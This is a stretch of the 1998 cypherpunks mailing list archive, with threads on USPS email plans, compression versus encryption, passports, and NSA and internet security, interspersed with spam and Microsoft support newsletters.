	pushing a standard by only acknowledgeing "postal" addresses,
	and probably pushing some kind of cost, since for obvious 
	reasons, these email addresses would have to be managed by
	the govts own servers.

	I predict that the idea will go through, the USPS will 
	consider charging people based on the space their incoming
	mail takes up, but change to a charge on outgoing mail after
	everyone raises a stink.  

	Then, some clever person will push a bill through congress
	forcing all commercial email to be sent from a postal email
	address, forcing spammers to pay a bulk rate and provide
	both a physical and internet return address.

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Mon, 10 Aug 1998 16:36:48 -0700 (PDT)
To: "Bernardo B. Terrado" <cypherpunks@toad.com
Subject: Re: compression vs encryption
In-Reply-To: <199808031315.PAA15001@replay.com>
Message-ID: <3.0.5.32.19980810163439.00b1c430@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 PM 8/6/98 +0800, Bernardo B. Terrado wrote:
>What's the difference between compression and encryption?
>Correct me if I'm wrong,  in compression we lose something, like in 
>image compression and audio compression,  but in encryption, we don't. 

Compression makes stuff smaller; encryption keeps stuff private.

Compression works by not sending data you don't need -
there are lossless compression systems, like simple run-length encoding
and more complex systems like Huffman and Lempel-Ziv,
which build abbreviations for common strings, 
and lossy compression systems like some JPEG and MPEG modes
and most voice compression systems which discard information
that doesn't have much effect on the user's perception of the image/sound.

You can find books on compression techniques, and can find
compression discussed in general books on algorithms.
For lossless compression, you can get by knowing simple math,
like probability and statistics, though it helps to know
about polynomials and modular arithmetic and such. For image compression, 
it helps to know about discrete cosine transforms and that sort of math.  
Audio compression includes simple techniques like
Adaptive Differential Pulse-Code Modulation, for which a little
calculus is helpful but not too critical, and complex techniques
using frequency spaces, Fourier transforms, and various models
of the human vocal tract, for which you need more math.

RLE is simple, and can work well or badly depending on the data.
For each set of repeated characters, it sends the character and count.
If the data usually has long runs of values, e.g. lots of black
and lots of white, it wins; if most values happen once in a row, it loses.
With Huffman coding, the input strings are usually the same length,
e.g. single letters, and the output strings are variable length,
with short output strings used for more frequently used inputs,
and longer output strings used for less frequently used inputs;
the more you know about the statistics of the input stream,
and the more unbalanced the statistics are, the smaller the output.
With Lempel-Ziv, the output strings are almost-constant length
indexes into a table of input strings which is built dynamically,
so the first time the compressor sees a string "ab", it creates a
table entry and sends the entries for "a" and "b", and the next time 
it sees "ab", it sends the code for "ab" (and also creates the 
code for "abc", if "c" is the next entry....)

There are also books about encryption.
Bruce Schneier's book "Applied Cryptography" is popular and good.

Most encryption systems compress their plaintext before encrypting,
partly because it's usually faster, partly because you can't
make encrypted text smaller by compressing it, and partly because
it can be more resistant to attacks like known-plaintext and chosen-plaintext.

>One sure protection againts evil hackers is encryption (?), but what if 
>that evil hacker deletes the ciphertext file and the plain text file (that
>is assuming the evil hacker just deletes every file he wants to delete).
>---at least he/she didn't read/saw the file.

If evil people can get on your system, you lose.
Encryption is part of protecting a system, but not enough.
Encrypting your disk drives helps reduce the risk if
they steal your computer (when police steal computers,
they use fancy words like "subpoena" and "confiscate", 
but it's the same thing :-).  Encrypting your email
means that evil people can't read it when it's in transit.
But if they can break in to your machine because you're using 
Windows or a badly-configured Unix system,
they may be able to read your mail or files before you encrypt them,
or read your incoming mail after you decrypt it,
or replace your encryption program with something that
also lets them decrypt the mail, and you still lose.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eduardo Montuani <edepa@argenet.com.ar>
Date: Mon, 10 Aug 1998 13:05:15 -0700 (PDT)
To: c-pride@juno.com
Subject: Nice to meet you
Message-ID: <35CF4F5F.2F7D3F0F@argenet.com.ar>
MIME-Version: 1.0
Content-Type: text/plain


EDEPA SRL
General Lavalle 4307
7600 - Mar del Plata
Buenos Aires - ARGENTINA
Voice & Fax: (54) 23 89-7598


Dear Sirs:

We are fish and seafood exporters of Argentinian origin, frozen fillets
or whole.
At this time we are able to offer the the following products:
- Hake    (Merlucius Hubbsi)
- Whiting / Sea Trout  (Cynoscion Striatus)
- Hoki / Patagonian Grenadier (Macroronus Magellanicus)
- Blue Fish (Pomatomus Salatrix)
- Menhaden (Brevoortia Aurea)
- Skate (Raja Flavirostris)
- Corvine / Croacker  (Micropogonias Furnieri)
- Allis Shad   (Prchilodus Platensis)
If you wish to have any particular information about other products or
about any other especial processing methods, please do not hesitate to
contact us.
Sincerely,

Eduardo Montuani
edepa@argenet.com.ar









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 10 Aug 1998 16:18:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Internet is rickety
Message-ID: <199808102318.SAA12542@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


See my editorial:

	http://www.mercurycenter.com/premium/business/docs/hotbutton09.htm

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <root@ssds.com>
Date: Mon, 10 Aug 1998 18:54:18 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
Message-ID: <Pine.LNX.3.96.980810194939.550A-100000@mothra.fastrans.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Aug 1998, Trei, Peter wrote:

> operations. There is no longer a critical need for a protected 
> monopoly in postal delivery.

If there ever was.

Someone once wrote that the difference between a good government
and a bad government is that the former simply builds the roads, the
latter tells you where to go.

In my opinion this could be extended to "the latter tells you how
to get it there".  Almost as if the government was delegated the
power to tell you what kind of car you could drive to work.  If
it doesn't have that power, how can it have the power to tell
you what conveyance to use for your letters?

Please refer to Lysander Spooner for an extended and depressing
treatment of this subject.

Jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 11 Aug 1998 06:08:36 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
Message-ID: <3.0.5.32.19980810230615.00924100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 02:24 PM 8/10/98 -0500, William H. Geiger III wrote:
>
>Many of the unusual suspects that will go along with this plan will be
>from the states like Alaska, Idaho, North Dakota, ...ect who are fearful
>that their constituents will actually have to pay a fair price to have
>mail and packages delivered to bum-fuck nowhere. I don't recall the name
>but one of the critter from Alaska was very upset that if USPS looses it's
>monopoly delivery in Alaska would no longer be subsidized and that they
>might have to pay market value to have packages delivered by plane to the
>far reaches of the wilderness (god forbid!!).
>

Where are you from?
Bum-fuck nowhere to you and bum-fuck nowhere to me are two different places.

A letter costs 32 cents (presently) whether you send it across town, or
across the country.
This knife cuts both ways. Once the precedent is set, other industries
would quickly join in.
How long would it take, do you think, until some whizbang at the electric
company decides 'lectric usage rates should be determined on distance from
the 'lectric generating plant?

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strcks93u3@worldnet.att.net
Date: Mon, 10 Aug 1998 23:36:26 -0700 (PDT)
To: stam8u8i21@worldnet.att.net
Subject: try again..
Message-ID: <B0000237220@gamma.hoovers.com>
MIME-Version: 1.0
Content-Type: text/plain



<HTML><PRE><BODY BGCOLOR="#fa8072"></P><P ALIGN=CENTER>
<FONT SIZE=5 COLOR="#0000EE">FREE FOR ADULTS ONLY</FONT>
<FONT COLOR="#FF0000">Hi I'm Pam * Want to See ME Nude?
<FONT COLOR="#0000FF"><B>Give me a look.</B>
<FONT COLOR=#FFFFFF">No Touching * AH TRY IT<BR>
<B>CLICK THIS</B>
</PRE></HTML>










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 11 Aug 1998 03:03:18 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Vodka: Russian Viagra/Man sues Kentucky cops for 'being too nice' http://stuffed.net/98/8/11/
Message-ID: <19980811080001.29271.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/11/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 11 Aug 1998 07:35:45 -0700 (PDT)
To: george breznay <sjmz@hplb.hpl.hp.com
Subject: Appeal coming in mail
Message-ID: <35D055A7.5CA5@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 8/11/98 8:14 AM

George B. Breznay, Director
Office of Hearings and Appeals
Department of Energy
Washington, DC 20585

Dear Director Breznay:

Purpose of this letter is appeal a Freedom of Information Act (FOIA)
denial.

Attached is Herbert Richardson's July 6, 1996 denial letter of request
95112002..

Richardson writes

  Under Title 10, Code of Federal Regulations (C.F.R), subsection
1004.1, the Department of    Energy will make available records which it
is authorized to withhold under the Act         whenever it determines
that disclosure is in the public interest.  In invoking exemptions 6  
and 7(c), we have determined that it is not in the public interest to
release the withheld   material.  In this request, we have determined
that the public interest in the identity of   individuals whose names
appear in investigative files does not outweigh these individuals'  
privacy interest.  Those interest include being free from intrusion into
the professional    and private lives.

Director Breznay, my FOIA was for "all investigative reports authored by
DOE into my allegations that NSA willfully and knowingly attempted to
sabotage DOE/Sandia cryptographic projects." 
http://jya.com/da/whpda.htm

THIS IS IN THE PUBLIC INTEREST.

I appeal.

The public has a right to know about fights for control of power between
US government agencies which endanger national security. 
http://www.aci.net/kalliste/nukearse.htm  And attempts to cover-up.
these fights.

I ask that you compile a Vaughn Index of the 215 items listed by
Ricardson.

  An agency is required to make a decision on an appeal
  within 20 days (excluding Saturdays, Sundays, and legal
  holidays). It is possible for an agency to extend the time
  limits by an additional 10 days.

I ask that you respond in the time allotted to you by law.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 11 Aug 1998 06:43:45 -0700 (PDT)
To: "Brown, R Ken" <ptrei@securitydynamics.com>
Subject: RE: Internet growth/Passport correlation?
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8336@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

> The figures are probably correct, but your
> interpretation is faulty.

You are right. I am wrong. I read it as "passports in circulation" 
which is obviously silly. The total number of passports
is going to be 5-10 times these numbers. Whoops.
We get 10 year passports as well. I just forgot.
And it looks like my 10-year  passport just expired.

Ken (who isn't speaking for his employers - but whose employers vaguely
expect him to have a valid passport, just in case... whoops again.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 11 Aug 1998 06:26:55 -0700 (PDT)
To: "'Brown, R Ken'" <cypherpunks@toad.com>
Subject: RE: Internet growth/Passport correlation?
Message-ID: <D104150098E6D111B7830000F8D90AE801795D@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


The figures are probably correct, but your
interpretation is faulty.

These days, US passports are good for 10
years. Thus, about 1/4 of the US population
has one. To Europeans this may sound like an
astonishingly low figure, but it's a big 
country, and a US citizen can visit Mexico 
and Canada without one.

The duration has been rising - my first passport,
issued in 1965, was good for only two years. This
was later bumped to 5, and then to 10. Even so, at
one time I had to visit an embassy to get extra
pages for visa stamps stapled in.

Peter Trei

> -----Original Message-----
> From:	Brown, R Ken [SMTP:brownrk1@texaco.com]
> 
> Surely these figures are an order of magnitude too low?
> Is it really true that only one in  30 or 40 US residents has a
> passport?
> 
> > Year - # US Passports Issued - # Internet Hosts
> > 1992 - 3,282,488             - 727,000
> > 1993 - 4,207,716             - 1,313,000
> > 1994 - 4,895,151             - 2,217,000
> > 1995 - 5,263,989             - 4,852,000
> > 1996 - 5,547,693             - 9,472,000
> > 1997 - 6,295,003             - 16,146,000




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 11 Aug 1998 08:06:18 -0700 (PDT)
To: "Trei, Peter" <cypherpunks@toad.com>
Subject: RE: Internet growth/Passport correlation?
In-Reply-To: <D104150098E6D111B7830000F8D90AE801795D@exna02.securitydynamics.com>
Message-ID: <199808111505.LAA21211@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 AM 8/11/98 -0400, Trei, Peter wrote:

>These days, US passports are good for 10
>years. Thus, about 1/4 of the US population
>has one. To Europeans this may sound like an
>astonishingly low figure, but it's a big 
>country, and a US citizen can visit Mexico 
>and Canada without one.

And the Caribbean.  Passport issuance is increasing by about 18% per annum because of a number of different trends.  International travel is way up, many new citizens want the passport as easy proof of citizenship without the stigma of the naturalization certificate, native-born Americans who now have to frequently present ID are also turning to the passport.  A passport is a single document that can be used to prove identity *and* right to work in the US when filling out the I-9 form for a new job.

>The duration has been rising - my first passport,
>issued in 1965, was good for only two years. This
>was later bumped to 5, and then to 10. Even so, at
>one time I had to visit an embassy to get extra
>pages for visa stamps stapled in.

Kids still get five-year passports.

Even though I naturally oppose government ID requirements, the passport does have certain advantages for those few times when I "need" government ID.  A passport has no useful information on it aside from name and DOB.  There is no address (unless you write one in the "if lost, return to" section.  No SS#.  The Passport number is not linked to many "useful" databases.  It is not part of the DMV social control system that has grown up around the Driver's License.  It is unchallengeable.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Lemons" <jlemons@multek.com>
Date: Tue, 11 Aug 1998 09:50:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cracked: WINDOWS.PWL
Message-ID: <8625665D.005C42DD.00@gatekeeper.multek.com>
MIME-Version: 1.0
Content-Type: text/plain


I seen the interesting article on this and was wondering if you had the
rest of the glide.c code because is was cut off at the end.

Thanks,
John...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dontspam-tzeruch@ceddec.com
Date: Tue, 11 Aug 1998 09:58:57 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <Pine.BSF.3.91.980809132342.5048B-100000@mcfeely.bsfs.org>
Message-ID: <98Aug11.125642edt.43010@brickwall.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 9 Aug 1998, Rabid Wombat wrote:

> This is how it works in a free-market economy (doh!).
> 
> One of the self-appointed/assumed functions of gubbmint is to "fix" this, 
> by granting some organization a monopoly in return for bearing the costs 
> of creating infrastructure, as well as spreading the cost of servicing a 
> (smaller) number of remote customers across a (larger) number of 
> non-remote customers.
> 
> Whether this is a good thing(tm) or a bad thing(tm) depends, as usual, on 
> which side of the subsidy you are on.

No, it can still be a bad thing even if I am the beneficiary.  The
question is whether or not it maximizes efficiency.  A stock market crash
will benefit the short sellers and owners of puts.  But it will also cause
a depression, which will still affect the short sellers.

> I would argue that such monopolies are desirable, and that their creation 
> is a proper function of a responsible government. When the monopoly is no 
> longer necessary (sufficient economy of scale has been reached to permit 
> a competitive market to adequately service the customer base), then 
> deregulation can occur.

There is a cross-subsidy.  The monopoly then pays the government to
maintain the monopoly indefinately using government force to drive out
competition.  Being able to legally imprison or shoot competitors is an
advantage that is hard to overcome. 

> I'm sure some on this list will argue this with me from their mountain 
> cabins in bf-nowhere, but without such monopolies, they'd be sending 
> smoke signals rather than paying $10,000 to get a phone line installed to 
> their home. If you doubt this, look at the heavy reliance on wireless 
> communications in third-world countries, and take a moment to consider 
> how recently the consumer-wireless market arrived on the scene. 

Alaska tends to be cold.  Should heat and other forms of energy be
subsidized, and roads built to wherever I want to place my cabin?  Arizona
is dry - should they get subsidized water?

Why is distance different than any other factor.  If I want to live in a
remote area, I should bear the costs of the remoteness, just as if I want
to live near a river, I will have to bear the costs of flood control or
damage from uncontrolled floods.  I don't have to live in a mountain
cabin, but if I do there will be costs.

The largest delay for consumer wireless has been government regulation
itself - not allowing efficient use of bandwidth.  (I think the first cell
phone was 1979).  And there was a CB craze, although it had limited range.
The big wait was for the FCC to catch up with technology (or for congress 
to allow them to do so).

> Before you argue "the best government is no government", visit a few 
> third-world capitols, and note how you move from a modern capitol city to 
> flintstones-like living in about 50km.

Many third world governments are thoroughly corrupt.  Across the border in
Mexico they have "Government" - are you saying that Mexico City is better
than Wyoming?  And the small villages have government even if they don't
have technology.

> A $.32 price on first-class mail to anywhere in the country is a good 
> deal for all. OTOH, package delivery has become sufficiently competitive, 
> and probably needs to be revamped.

Generally wealthier people can afford to live in the remote areas, and can
afford alternatives to first class mail.  Poor people rely on first class
mail within cities to do much of their business, and that is mainly local. 
So you have another case of the poor subsidizing the rich. 

> Just my $.02.

No, your $0.32, soon to be more.

--- reply to tzeruch - at - ceddec - dot - com ---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 11 Aug 1998 13:55:39 -0700 (PDT)
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: Internet is rickety
In-Reply-To: <199808102318.SAA12542@mixer.visi.com>
Message-ID: <199808112055.NAA01325@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


cool editorial, but where do you get in the mandatory
plug for strong crypto? everyone here agrees (and
points out to everyone willing to listen)
that the internet would be much more secure if we
had good crypto.

if the internet is insecure, blame the real source
of the problem: the multibillion dollar NSA that
has a vested interest in keeping the world technology
weak..

makes ya wonder-- are they the only parasitical govt agency
or business that has an interest in keeping its
host weak, without killing it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WSander473@aol.com
Date: Tue, 11 Aug 1998 11:00:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ubsubscribe me
Message-ID: <f40a124b.35d08670@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


i wish to be unsubscribed. wsander473




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 11 Aug 1998 12:21:35 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 11, 1998
Message-ID: <199808111903.OAA13552@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/   for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001400@news.newswire.microsoft.com>
Date: Tue, 11 Aug 1998 18:23:00 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Microsoft Office Support News Watch - August 10, 1998
Message-ID: <199808120122.SAA26644@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft Office Support News Watch
===================================

As a subscriber to the Microsoft Office Support News Watch, you receive e-mail twice each month that highlights some of the new articles recently published on Support Online, Microsoft's award-winning technical support web site.


E-mail Security Alert
=====================

Recently Microsoft was notified by AUSCERT (http://www.auscert.org.au), OUSPG (http://www.oulu.fi) and NTBugtraq (http://ntbugtraq.ntadvice.com) of a security issue affecting the way Microsoft e-mail clients handle file attachments with extremely long file names.

On July 27th, Microsoft published a patch for Outlook 98 and Outlook Express 4.x that fixes the problems as reported. For more information about this problem and how to fix it, link to the following Microsoft security bulletin:

   http://www.microsoft.com/security/bulletins/ms98-008.htm

Microsoft has published the following two Knowledge Base (KB) articles on this issue:

   - Microsoft Knowledge Base (KB) article Q168019, Update Available For Outlook Express Security Issue,
http://support.microsoft.com/support/kb/articles/q168/0/19.asp

   - Microsoft Knowledge Base (KB) article Q175807, OL98:Update Available For Outlook 98 Security Issue,
http://support.microsoft.com/support/kb/articles/q175/8/07.asp


Year 2000 Compliance Information
================================

For the latest official word about year 2000 compliance by Microsoft products, visit the "Microsoft Year 2000 Resource Center" at:

   http://www.microsoft.com/y2k/


Microsoft Office Update Web Site
================================

For the latest in product information, enhancements, assistance and business resources, visit the Microsoft Office Update Site. This site is continually updated, so check back often for new information.

   http://www.microsoft.com/office/update.asp


Get Support Online Articles by E-mail
=====================================

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message, enter the Article-ID number (Qnnnnnn). For example to receive Q162721, your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in the Subject line. For example:

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see
http://support.microsoft.com/support/kb/articles/q183/1/21.asp.


Sincerely,
The Support Online staff

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 11 Aug 1998 16:27:29 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: Internet is rickety
In-Reply-To: <Pine.LNX.3.96.980811180002.10326A-100000@albert>
Message-ID: <199808112327.QAA21344@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



MG: you will find most people here will disagree with you.
cyberspace is very, very weak without crypto. when you
think about it, 98% of cyberspace is the "stuff between
the wires". the other 2% are the people on each end.
now, crypto protects the 98%, but agreed, the 2% is
still vulnerable.

>Certainly, good crypto would plug up some holes but general internet
>technology is full of cracks. All the crypto in the universe won't
>stop a buffer overflow in your mail program, or 1000's of nested tags
>from crashing your browser in a DoS. 

this is nothing anyone cares about in the cyberspatial world.
these are thing that happen outside of cyberspace.
the bigtime issue is internet
commerce, security of your mail. how about if someone reads your
mail to steal your money?

>I don't support export restrictions any more than anyone else who is
>likely to be on cypherpunks .. but laying all the evils in the universe
>at NSA's door is a wee bit irresponsible. 

no, I'd say it's downright patriotic <g>

p.s.-- can you quote to me how many billions go to the nsa every
year? and would you care to calculate how much of your own
salary  from your paycheck is sent to them?  and you think
you are getting your money's worth? rather than paying someone
to hold you down?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001402@news.newswire.microsoft.com>
Date: Tue, 11 Aug 1998 21:44:41 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Windows and Internet Explorer Support News Watch - August 10, 1998
Message-ID: <199808120444.VAA27623@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Windows and Internet Explorer Support News Watch
================================================

As a subscriber to the Windows and Internet Explorer Support News Watch
you receive e-mail twice each month that highlights some of the new articles recently published on Support Online Microsoft's award-winning technical support web site. The following are new Support Online articles that answer frequently asked questions about using Windows and Internet Explorer:

Contents
--------

 - Microsoft Windows 98
 - Microsoft Internet Explorer for Windows 95 and Windows NT 4.0
 - Microsoft Windows CE
 - Microsoft Windows 95
 - Internet Explorer for Unix
 - Get Support Online Articles by E-mail
 - Visit Support Online

Windows 98
----------

Repeatedly Prompted for Disk During Windows 98 Setup (Q190984)
http://support.microsoft.com/support/kb/articles/q190/9/84.asp

No Network Connectivity After Msbatch.inf Automated Installation (Q190954)
http://support.microsoft.com/support/kb/articles/q190/9/54.asp

Write Data Error When You Try to Use a CD-ROM Re-Writable Drive (Q190922)
http://support.microsoft.com/support/kb/articles/q190/9/22.asp

Windows-Based Games May Not Play Background Music in Windows 98 (Q190913)
http://support.microsoft.com/support/kb/articles/q190/9/13.asp

Problems Restoring a Windows 95 Backup Set File in Windows 98 (Q190897)
http://support.microsoft.com/support/kb/articles/q190/8/97.asp

"Error Initializing Modem" with pcANYWHERE 7.0 (Q190840)
http://support.microsoft.com/support/kb/articles/q190/8/40.asp

Modem Included with Compaq Presario 1065 Computer Does Not Work (Q190815)
http://support.microsoft.com/support/kb/articles/q190/8/15.asp

Computer Hibernates When Standby Is Pressed (Q190715)
http://support.microsoft.com/support/kb/articles/q190/7/15.asp

After Successfully Logging On WHOAMI Displays Not Logged On (Q190694)
http://support.microsoft.com/support/kb/articles/q190/6/94.asp

Troubleshooting Windows 98 Uninstall Problems (Q190672)
http://support.microsoft.com/support/kb/articles/q190/6/72.asp

Cannot Install Novell Client32 Software Over a Network (Q190656)
http://support.microsoft.com/support/kb/articles/q190/6/56.asp

Problems After You Install Hewlett-Packard HP JetAdmin Service (Q190628)
http://support.microsoft.com/support/kb/articles/q190/6/28.asp

Cold Boot Hangs IBM Aptiva E-Series Computer After Upgrading (Q190603)
http://support.microsoft.com/support/kb/articles/q190/6/03.asp

Troubleshooting Modem Problems in Windows 98 (Q190554)
http://support.microsoft.com/support/kb/articles/q190/5/54.asp

Windows 98 WinModem Readme.txt File (Q190422)
http://support.microsoft.com/support/kb/articles/q190/4/22.asp

Unable to Use 3Com Multifunction PC Card in Windows 98 (Q190421)
http://support.microsoft.com/support/kb/articles/q190/4/21.asp

Err Msg: The Path <Web Address> Does Not Exist or Is Not a... (Q190414)
http://support.microsoft.com/support/kb/articles/q190/4/14.asp

Hard Disks Missing After Resuming from Suspend Mode (Q190368)
http://support.microsoft.com/support/kb/articles/q190/3/68.asp

Error Message When You Attempt to Open Control Panel After Setup (Q190367)
http://support.microsoft.com/support/kb/articles/q190/3/67.asp

Additional Modem Drivers Included on the Windows 98 CD-ROM (Q190363)
http://support.microsoft.com/support/kb/articles/q190/3/63.asp

Battery Alarm May Not Play Sound or Display Message (Q190356)
http://support.microsoft.com/support/kb/articles/q190/3/56.asp

How to Use Real-Mode CD-ROM Drivers from Windows 98 Startup Disk (Q190303)
http://support.microsoft.com/support/kb/articles/q190/3/03.asp

How to Enable or Disable the Active Desktop (Q190228)
http://support.microsoft.com/support/kb/articles/q190/2/28.asp

How to Determine Installed Version of DirectX (Q157730)
http://support.microsoft.com/support/kb/articles/q157/7/30.asp

Err Msg: Could Not Decode This Setup (.cab) File... (Q140901)
http://support.microsoft.com/support/kb/articles/q140/9/01.asp


Internet Explorer for Windows 95 and Windows NT
-----------------------------------------------

Winsock Programs May Not Dial Automatically (Q190921)
http://support.microsoft.com/support/kb/articles/q190/9/21.asp

Err Msg: A Required .DLL File, PNCRT.DLL, Was Not Found (Q190898)
http://support.microsoft.com/support/kb/articles/q190/8/98.asp

"Unable to Download Components" Adding Optional Components (Q190830)
http://support.microsoft.com/support/kb/articles/q190/8/30.asp

How to Disable the Active Desktop By Default for New Users (Q190499)
http://support.microsoft.com/support/kb/articles/q190/4/99.asp

How to Re-create the Show Desktop Icon on Quick Launch Toolbar (Q190355)
http://support.microsoft.com/support/kb/articles/q190/3/55.asp

Cannot Search for Files Containing Text on CDFS/NTFS Drives (Q190290)
http://support.microsoft.com/support/kb/articles/q190/2/90.asp


Windows CE
----------

Err Msg: To Synchronize Channels You Must Be Running MSIE 4.0... (Q190963)
http://support.microsoft.com/support/kb/articles/q190/9/63.asp

Word 97 Hangs When Scrolling in Converted Pocket Word Document (Q190933)
http://support.microsoft.com/support/kb/articles/q190/9/33.asp

Unable to Connect to ISP After You Install Windows CE Services (Q190909)
http://support.microsoft.com/support/kb/articles/q190/9/09.asp

